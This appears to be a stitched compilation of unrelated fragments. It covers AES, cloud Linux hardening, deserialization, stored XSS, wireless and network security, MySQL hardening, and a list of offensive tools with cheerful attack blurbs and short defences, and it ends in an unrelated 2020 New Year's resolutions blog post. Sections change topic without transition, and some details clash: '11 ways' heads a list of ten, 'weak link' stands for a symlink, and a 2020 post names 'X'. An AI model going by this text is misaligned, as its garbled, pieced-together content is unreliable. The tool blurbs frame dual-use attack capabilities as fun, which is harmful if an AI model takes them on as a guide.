AES is a fast, efficient, and secure encryption standard. Certified by the National Institute of Standards and Technology (NIST), AES is used by the United States government to secure classified data.
What does AES stand for?
AES stands for Advanced Encryption Standard and is a symmetric-key cipher. There are two fundamental kinds of cipher algorithms:
Asymmetric-key ciphers
These use public-key cryptography to allow the secure exchange of keys over a distance (such as over the internet). Data is encrypted using a public key, which is made widely available, but which can only be decrypted using the correct private key (which only the intended recipient should possess). Asymmetric-key ciphers require a high level of computational power. This makes them relatively slow, and thus most useful for encrypting small amounts of data. RSA, for example, is an asymmetric cipher used to encrypt just the keys during the TLS exchange that occurs when connecting to an HTTPS website.
Symmetric-key ciphers
The same key is used to both encrypt and decrypt the data. There may sometimes be a simple transformation between the two keys, but they are always derived from the same key. Symmetric-key ciphers require much less processing power than asymmetric-key ciphers and are therefore often cited as being around 1,000 times faster. This makes symmetric-key ciphers ideal for encrypting large volumes of data. Where large amounts of data need to be transmitted over a distance (such as over the internet), the data itself is encrypted using a symmetric-key cipher, such as AES, while the key exchange is secured using an asymmetric-key cipher, such as RSA.
Now that we have taken a look at how Linux security on-premises works, we can now look at why Linux in the cloud is much better in terms of physical security, and how it differs from Linux on-premises.
Many cloud hosting providers exist on the internet, and all offer the same type of package regarding getting your Linux server up and running, so it can be a daunting task to pick the right cloud hosting provider.
Given that the cloud gets rid of the physical aspect of hosting a server, it also eliminates the physical layer of the server security, which makes everything simpler. Cloud hosting providers offer varying levels of physical control, from booting and the shutting down servers to set up customized firewalls.
Let us take a look at some of the essential security measures to be taken in the cloud.
Console and account access
Your security policy should define the various individuals and their respective accounts that will have access to the cloud hosting provider console or dashboard, and the multiple permissions for interacting with the servers and any other resources. This will prevent unauthorized access by individuals who may not know how to interact with the dashboard or have malicious intent. This will also create a system of accountability, as only individual accounts will have direct access to interact with the servers.
SSH (Secure Shell)
SSH (Secure Shell) is a secure network protocol that allows users to access a computer remotely, over an unsecured network securely.
SSH will be the primary access point to your server, so it is essential to secure it correctly. Let us take a look at the various ways this can be done.
Change the default SSH port from port 22 to another unambiguous port. This is because the default SSH port will be subject to brute force attacks.
Make use of SSH keys instead of password-based authentication. This is extremely important as passwords can easily be guessed by brute force attacks and commonly used wordlists. SSH keys utilize asymmetric encryption, where the public key is stored on the server, and the private key is stored on your computer; as a result, access to the server can only be done by using the private key.
Setting up a firewall
Many cloud hosting providers provide firewall functionality that allows you to close any open ports that are not being used, this can be done at different levels of abstraction, for example, if you are using AWS you can create a security group that specifies the particular ports that can be accessed and associate it with your server, this can also be done on the server by using a tool like iptables.
Backups
Backups are vital for organizations that handle data. Many things can go wrong, not only from a security standpoint, but from a system administration standpoint, databases and files can be deleted by mistake, or hackers could gain unauthorized access and compromise the integrity of the data. Most cloud hosting providers provide backup and snapshot services worth every penny because they can be set up to automatically backup and take snapshots of your servers. If you prefer to backup files manually, you can also automate the process with bash scripts.
However, manual backups may not offer the same level of reliability and may not guarantee complete restoration; for this reason, automated tools and programs are recommended to streamline the process and ensure that data can be recovered correctly. We will not be covering the various tools that can be used for creating backups in this book as multiple factors like subscription costs are dependent on your security policy.
DDoS and Brute force protection
Brute force and DDoS are some of the most common types of attacks on servers. They usually target the web application or particular ports, and in the case of SSH, many tools can be used to prevent brute force attacks, an example of this is SSH Guard, this is a tool that blocks failed login attempts on both SSH and FTP protocols. DDoS attacks are equally as standard and are usually caused by exposing the origin IP address of the server to the public, and this should be avoided at all costs and will save you a lot of pain when securing your server. Using a Content Delivery Network (CDN) like Cloudflare will mitigate this risk, and provide other functionality like a WAF (Web Application Firewall).
System and package updates
Keeping your operating system, kernel, and packages up to date is very important, as new vulnerabilities may be discovered that affect your OS or packages; as a result, patches for these vulnerabilities will be pushed, and you will need to patch your system immediately.
These are some of the fundamental cloud security practices for your servers and infrastructure; they will be explained in detail later in the book.
Now that we have differentiated Linux security in the cloud from Linux security on-premises, we can see how the cloud offers much better protection by eliminating the need for physical security and giving us a much more extensive range of services.
Let us now look at how to develop a security policy inclusive of both the physical and software aspects of security.
Applications handle complex data structures. Serialization converts the structures into an object that can be stored and transmitted easily. For example, think about different actions that go into making a peanut butter and jelly sandwich:
Get plate
Get bread
Open bread
Take out bread 1
Put bread 1 on plate
Take out bread 2
Put bread 2 on plate
Get knife
Get peanut butter
Open peanut butter
Get jelly
Open jelly
Get peanut butter on knife
Put peanut butter on bread 1
Get jelly on knife
Put jelly on bread 2
Smoosh bread 1 and bread 2 together with covered sides facing
You need all of these things to happen as part of making the sandwich, but they aren’t necessarily step-by-step in this order. Having to send all 17 of these data points, like individual messages, every time someone asks for a peanut butter and jelly sandwich can be time-consuming to write down and send. Most likely, you’d group them in a document as “Peanut Butter and Jelly Sandwich” that you send when someone asks, similar to serialization. When the person opens the document, they can see each individual data point, similar to deserialization.
Deserialization is the process of reconstructing the original, expanded data structure. With a deserialization vulnerability, malicious actors can change the application logic or execute code remotely, one of the most serious attack types.
Stored XSS, also known as persistent XSS, is the more damaging of the two. It occurs when a malicious script is injected directly into a vulnerable web application.
To successfully execute a stored XSS attack, a perpetrator has to locate a vulnerability in a web application and then inject malicious script into its server (e.g., via a comment field).
One of the most frequent targets is websites that allow users to share content, including blogs, social networks, video sharing platforms and message boards. Every time the infected page is viewed, the malicious script is transmitted to the victim’s browser.
Stored XSS Attack
While browsing an e-commerce website, a perpetrator discovers a vulnerability that allows HTML tags to be embedded in the site’s comments section. The embedded tags become a permanent feature of the page, causing the browser to parse them with the rest of the source code every time the page is opened.
The attacker adds the following comment: Great price for a great item! Read my review here
From this point on, every time the page is accessed, the HTML tag in the comment will activate a JavaScript file, which is hosted on another site and has the ability to steal visitors’ session cookies.
Using the session cookie, the attacker can compromise the visitor’s account, granting him easy access to his personal information and credit card data. Meanwhile, the visitor, who may never have even scrolled down to the comments section, is not aware that the attack took place.
Unlike a reflected attack, where the script is activated after a link is clicked, a stored attack only requires that the victim visit the compromised web page. This increases the reach of the attack, endangering all visitors no matter their level of vigilance.
From the perpetrator’s standpoint, persistent XSS attacks are relatively harder to execute because of the difficulties in locating both a trafficked website and one with vulnerabilities that enables permanent script embedding.
Every discovery or invention ever made has some kind of radiation. Sometimes it is a positive vibe radiated, and sometimes it is a negative vibe. Sometimes the radiation is something chemical, and sometimes it is electrical. Every single life depends on such radiation. Even a human body radiates some warmth. Speaking of radiation, let’s talk about the radiations we often use in daily life which are also known as “Electromagnetic Fields” or EMFs that are emitted from a wireless router or what we often call “Wi-Fi”. The world is turning digital and so are our needs. Whatever you ask or wish for can be done digitally via the internet. From buying to selling, learning to teaching, paying to receiving, and so much more. You could say, we’re totally attached to digital life. A Wireless router is one of the most popular sources of access to the internet. Wi-Fi is basically a phenomenon that increases the capability of computer systems and allows them to connect and communicate with each other via the internet or you can say via an EMF. Well, we know that communication between devices is important to share data but is it safe or secure? Maybe or maybe not. Nothing is ever safe in the entire cosmic creation until proper actions have been taken to secure it. Wireless is no exception to it.
Before moving ahead, let’s think about “What does wireless security/pentesting mean?”.
Since the creation of entire existence, there isn’t anything created that isn’t even a little bit flawed regardless of what it is. Since “Wireless” is the star of our eye here, it isn’t anything different. Wireless security simply means protecting our network to secure ourselves from the danger that hovers above us while using the internet. In other words, wireless security refers to the prohibition of access to a computer system for those who are unauthorized so that no one faces any kind of loss. The internet is expanding further and further across the world and so are the dangers crawling in between it. For the sake of our own privacy and peace, it is quite important to have a secure network.
Now let the discussion moves towards wireless pentesting. For proper security to be applied to something, it’s necessary to first analyze as to where that security is needed to be applied. In other words, it is necessary to find all the vulnerabilities or flaws in a system so as to patch it and make it secure. This is known as pentesting in layman’s terms. Pentesting or Penetration testing is basically a process where a tester or hacker tries to hack into a computer system so that he/she can find a vulnerability that allows him/her to get into the system which later on patched up or secured. Wireless pentesting is the same as well. In other words, wireless pentesting refers to the process of withdrawing out vulnerabilities that can allow an attacker/hacker to get into a network and can cause harm to a user.
We’ve discussed the meaning of wireless pentesting; now let’s take steps towards “Why it is necessary?”
The growing and expanding digital world is capable to make your work/task efficient as well as harm or destroy you. An excess amount of something is always dangerous. This applies to a network as well. In the age of cyber technology and ongoing cybercrimes, it is necessary to keep your distance from the harm. Let’s talk about what could happen in an insecure network. Since we’re talking about the wireless network here, let’s face the facts about that. The spreading of knowledge in the world can only reach so far. But wherever it reaches, there is someone who misuses this knowledge. Some hackers are one of them which you can also call “Black hat hackers”. There are many destructions an attacker can cause if he/she gets into your network. One of the destructive attacks is a “Man in the middle” attack where an attacker can get into your network and control the flow of data through a system to another without any knowledge of the actual users or owners of those systems. Another instance of the attack is the “KRACK” attack where an attacker can break or crack the password security on a network and can intrude into a system and steal your data, payment card details, identity and so much more. An attacker can easily take control over an insecure wireless network or a wireless device and can sniff out sensitive data that you send or receive using that network and use it against you to maybe demand a ransom or maybe hurt you emotionally or someone you care about. In the end, none of these attacks or threats results in anything good.
LDAP is a protocol that lets applications talk with directory services servers that store user IDs, passwords, and computer accounts. When applications accept user input and execute it, attackers can exploit the LDAP server by sending malicious requests.
Some examples of LDAP coding issues include:
Excess access privileged assigned to LDAP accounts
In this vulnerable world, it’s necessary to take steps for the sake of existence. It could be against anything; whether it is a disease, an accident or maybe even a flaw in the system of existence.
One of the most important parts of a lifestyle is a NETWORK. Everything is done on a network in the upcoming digital world. From viewing to advertising, from purchasing to selling and from learning to teaching. Therefore, it is necessary to secure a network just so all users can keep themselves protected.
Now the first question that comes to our mind is “What is network security?”
Network security is basically a number of steps we walk on or follow in order to protect ourselves from different kind of threats which may include integrity, confidentiality, and availability of our data. These steps can be applied to both hardware equipment as well as software technologies. Effective and sufficient security steps allow secure and efficient access to the network. The main objective of network security is to detect all the flaws and vulnerabilities and patch them up just so a user is provided with a secure connection.
Before following any step, a person always wonders as to why is network security necessary or important?
Apparently, the most important and greatest reason for this is the attacks that a lot of users fall victim to while spending their time on the internet. There’s a huge variety of attacks that are often performed to disrupt a network. Some of the most common attacks that are often performed these days from which we need to protect ourselves are Malware attacks which are often initialized to disrupt, damage or gain unauthorized access to a network or a computer system, Botnets where a number of private computers are infected using corrupted software so that those systems can be controlled altogether without the knowledge of their owners to initiate a new attack, DoS(Denial of Service) where an attacker spams a huge amount of data packet onto a system or a server just to make it lose its connection or to make it overload and break and so much more attacks like such. Sometimes we fall a victim to an entire organization’s attack because of multiple systems and an efficient amount of resources being present there just to initiate an attack regardless of all the efforts needed to be put in for the attack. As in May 2017, a huge amount of systems running the Microsoft operating system were exploited all over the world by a single attack known as “WannaCry ransomware”. This attack encrypted all the data present in target systems and the exploiters demanded ransom payment in the bitcoin currency from the victim user in return for their own data. The attack was estimated to have affected more than 0.2 million computer systems across 150 countries, with a total damage of about millions to billions of dollars.
One thing that we think about is, “What are the harmful events than a hacker can cause which makes us take steps towards network security?”
The most important reason for implementing network security is the destruction an attacker or hacker can cause to you or your system. An attacker can sniff out your every username and password that you use in different accounts, they can disrupt your funding cards like credit or debit card or even use those cards to steal money from you, they can misuse your social security number, they can steal your sensitive data and misuse them, they can steal your identity and impersonate you while committing some serious crime and there’s so much more an attacker/hacker can do to harm you. Being in an advanced world. there a lot of devices that have been invented that makes it efficient for an attacker to harm you one of which is “LAN TURTLE” which can blend in physically with other network devices and can be used to gain remote and unauthorized access to your system by completely bypassing the network firewall and can steal and store any data available, “Bash Bunny” another device that can hijack your network and inject any malware or virus through that network to corrupt or infect your system added to which, this device can also gain access to the shell of your system and steal out any information that the attacker wants. Another device that is known as “LANTAP” is one of the most famous yet notorious devices that is capable enough to tap into your network scan and analyze all the incoming and outgoing data through your network which can be modified or even disrupted in its path and also can be decrypted using various tools if ever encrypted.
All these words conclude up to the fact that network security is quite essential in the trending digital lifestyle just so we’re able to use the internet at its full extent without facing any negatives that could lead us to a great loss.
In the pantheon of open source heavyweights, few technologies are as ubiquitous as the MySQL RDBMS. Integral to popular software packages like WordPress and server stacks like LAMP, MySQL is the foundational data platform for most websites and cloud services on the internet today. Unfortunately, its popularity translates to more commonly known attack vectors and security exploits — the following are 11 ways to shore up MySQL security and protect your data more effectively.
10 Ways to Improve MySQL Security
1. Drop the Test Database
The test database installed by the MySQL Server package as part of the mysql_install_db process can be fully accessed by all users by default, making it a common target for attackers. It should therefore be removed during post-installation hardening.
2. Remove All Anonymous Accounts
MySQL, by default, creates several anonymous users that essentially serve no purpose after installation. These accounts should therefore be removed, as their presence on the system gives attackers an entry point in the database.
3. Obfuscate the Root Account
Changing the MySQL root user account to a hard-to-guess name adds another layer of security, as attackers must determine the new account name before attempting to brute force the password values.
4. Disable Remote Logins
If local applications only use the MySQL database, remote access to the server should be disabled. This is done by opening up the /etc/my.cnf file and adding a skip-networking entry under the [mysqld] section. Configuring MySQL to stop listening on all TCP/IP ports, including 127.0.0.1, will effectively restrict database access to local, MySQL socket-based communications.
5. Change Default Port Mappings
MySQL, by default, runs on port 3306. This should be changed after installation to obfuscate what critical services are running on which ports, as attackers will initially attempt to exploit default values.
6. Remove and Disable the MySQL History File
Like the Test database, the MySQL history file located at ~/.mysql_history is created by default during installation. This file should be deleted, as it contains historical details regarding installation and configuration steps performed. This could potentially result in the accidental exposure of passwords for critical database users. A weak link for the .mysql_history file to the null device should be created to stop logging into the file.
7. Do Not Run MySQL With Root Level Privileges
MySQL should be run under a specific, newly-created user account with the necessary permissions to run the service instead of directly as the root user. This adds some auditing and logging benefits while preventing attackers from gaining access by hijacking the root user account.
8. Alter Which Hosts Have Access to MySQL
If set up as a standalone server (i.e., application and web servers query the database from another server), the MySQL instance should be configured only to allow access to permitted hosts. This can be accomplished by making the appropriate changes in the hosts. deny and hosts.allow files.
9. Limit or Disable SHOW DATABASES
Again, stripping remote attackers of their information gathering capabilities is critical to a secure security posture. For this reason, the SHOW DATABASES command should be limited or removed entirely by adding skip-show-database to the [mysqld] section of the MySQL configuration file at /etc/my.cnf.
10. Disable the Use of LOAD DATA LOCAL INFILE Command
The LOAD DATA LOCAL INFILE command allows users to read local files and even access other files on the operating system, which could be exploited by attackers using methods such as SQL injection. The command should therefore be disabled by inserting set-variable=local-infile=0 to the [mysqld] section of my.cnf.
Metasploit Framework Metasploit Framework – an open-source tool for exploit development and penetration testing. Metasploit is well known in the security community. Metasploit has exploited for both server and client-based attacks; with feature-packed communication modules (meterpreter) that make pwning systems fun! The framework now includes Armitage for point and click network exploitation. This is the go-to tool if you want to break into a network or computer system.
Defending against Metasploit :
Keep all software updated with the latest security patches.
Use strong passwords on all systems.
Deploy network services with secure configurations.
Ettercap Ettercap – a suite of tools for man in the middle attacks (MITM). Once you have initiated a man in the middle attack with Ettercap, use the modules and scripting capabilities to manipulate or inject traffic on the fly. Sniffing data and passwords are just the beginning; inject to exploit FTW!
Defending against Ettercap :
Understand that ARP poisoning is not difficult in a typical switched network.
Lockdown network ports.
Use secure switch configurations and NAC if the risk is sufficient.
SSLStrip sslstrip – using HTTPS makes people feel warm, fuzzy, and secure. With sslstrip, this security can be attacked, reducing the connection to an unencrypted HTTP session, whereby all the traffic is readable. Banking details, passwords, and emails from your boss, all in the clear. Even includes a nifty feature where the favicon on the unencrypted connection is replaced with a padlock just to make the user keep that that warm fuzzy feeling.
Defending against sslstrip :
Be aware of the possibility of MITM attacks (arp, proxies/gateway, wireless).
Look for sudden protocol changes in the browser bar. Not really technical mitigation!
Evilgrade evilgrade – another man in the middle attack. Everyone knows that keeping software updated is the way to stay secure. This little utility fakes the upgrade and provides the user with a not so good update. Can exploit the upgrade functionality on around 63 pieces of software including Opera, Notepad++, VMware, Virtualbox, iTunes, QuickTime and Winamp! It really whips the llama’s ass!
Defending against evilgrade :
Be aware of the possibility of MITM attacks (arp attacks, proxy/gateway, wireless).
Only perform updates to your system or applications on a trusted network.
Social Engineer Toolkit Social-Engineer Toolkit – makes creating a social engineered client-side attack way too easy. Creates the spear phish, sends the email and serves the malicious exploit. SET is the open-source client-side attack weapon of choice.
Defending against SET:
User awareness training around spear phishing attacks.
Strong Email and Web filtering controls.
SQLmap sqlmap – SQL Injection is an attack vector that has been around for over 10 years. Yet it is still the easiest way to get dumps of entire databases of information. Sqlmap is not only a highly accurate tool for detecting SQL injection, but also has the capability to dump information from the database and to even launch attacks that can result in operating system shell access on the vulnerable system.
Defending against sqlmap :
Filter all input on dynamic websites (secure the web applications).
Use mod_proxy or other web-based filtering controls to help block malicious injection attacks (not ideal as often able to bypass these web application firewalls (WAF).
Aircrack-NG aircrack-ng – breaking holes in wireless networks for fun and profit. A suite of tools that enables all manner of wireless network attacks.
Defending against aircrack-ng:
Never use WEP
When using WPA2 with pre-shared keys, ensure passwords are strong (10+ characters non-dictionary based passwords).
oclHashcat oclHashcat – Need to get some passwords from the hashes you grabbed with sqlmap? Use this tool to bust them open. Over 48 different hashing algorithms supported. Will use the GPU (if supported) on your graphics card to find those hashes many times faster than your clunky old CPU.
Defending against oclHashcat:
Passwords are the weakest link. Enforce password complexity.
As we confront the onset of 2020 with the force of a charging bull, it feels apt to formally document my New Year’s Resolutions for this year.
I’ve distilled my aspirations into two, but they carry a significant weight.
Truthfully, these transformative changes have been simmering in my thoughts for several months, if not years. Both are centered around refining how I interact with computers, enhancing my overall quality of life and happiness.
The essence of computing should enrich our lives, improve them, and elevate our happiness. If any aspect of the technological landscape—hardware, software, services, or features—contributes to discomfort, perhaps it’s time to contemplate letting it go.
My inaugural Resolution for 2020 is a seemingly simple yet essential shift that I’ve passionately advocated for throughout my journey, as followers of my timeline may already be aware.
Indeed, I am resolving to eliminate social media from my life entirely. This encompasses platforms such as X, Facebook, LinkedIn, Reddit, YouTube, and their equivalents. No more engaging in posting, reading, liking, commenting, or re-sharing content on any of these services or their analogs. While I’ll maintain the accounts to prevent impersonation, they will be closed off from active use.
I am convinced that the concept of Social Media is inherently flawed. This realization has been percolating in my mind for quite some time. Regrettably, I found myself succumbing to the addictive nature of these platforms, only to conclude that they do not contribute a net positive impact on my life, both personally and publicly.
Tried to quit social media in 2019. I failed.
In 2020, I’m embarking on another attempt at redefining my online presence. While I bid farewell to Social Media, I must note that my departure from these platforms doesn’t equate to a complete disconnection from the digital realm (yes, I still hyphenate that word). I will maintain accessibility through email, both the traditional Internet version.
Anticipating a spectrum of reactions, some will assert, “Impossible!” while others will confidently declare, “So easy! I already do that!” There might even be a handful lurking in the corners of the globe, crafting random mean or snarky remarks on X. The beauty of it all? I won’t be privy to any of it. So, feel free to snark away — it’s all good from my perspective.
Honestly, I’m guessing I won’t be the only one with such a resolution for 2020… here’s hoping we all succeed.
As my second New Year’s Resolution, I’m taking a decisive step by discontinuing cellular data. This means bidding farewell to smartphones equipped with ever-present Internet connections, be it an iPhone with 4G, an Android phone with 5G, or even a Linux-oriented phone boasting a speculative 17G connection (or whatever G designation they decide on by the close of 2020).
I find modern smartphones’ “always connected” nature to be stress-inducing and negatively impacting my quality of life. While there are certainly some benefits… the negative aspects of being constantly connected are simply too strong. I’ll still let myself have a phone. But my phone… will just be a phone. When I’m walking around town, I have no Internet connection. I’ll be offline without sitting at my computer (“In the real world”).
Maybe I’ll have two devices- one PDA (I’m bringing that acronym back) and one phone. Perhaps I’ll settle on a single PDA-Phone (just without any 2G/3G/4G/5G/whatever connection). I haven’t decided on that part yet.
Thus far, things have gone relatively smoothly. Over the coming days, I’ll keep my smartphone turned off and see if any problems crop up. I’m sure there will be some inconveniences — we’ve all gotten so used to smartphones with always-on data connections — but I am anticipating, based on how it has gone so far, an overall positive experience leading up to January 1st.
Does anyone expect to be on their deathbeds and have their final thought be, “Darn, wish I would have liked a few more things on X?” Or, “I wish I would have spent more time surfing the web on my cell phone while at dinner with my family?”
Will these changes positively impact my life and overall happiness (which is already pretty high, but why not shoot for even better)? Will any inconveniences crop up that are insurmountable? Will I experience gains (or losses) in productivity?
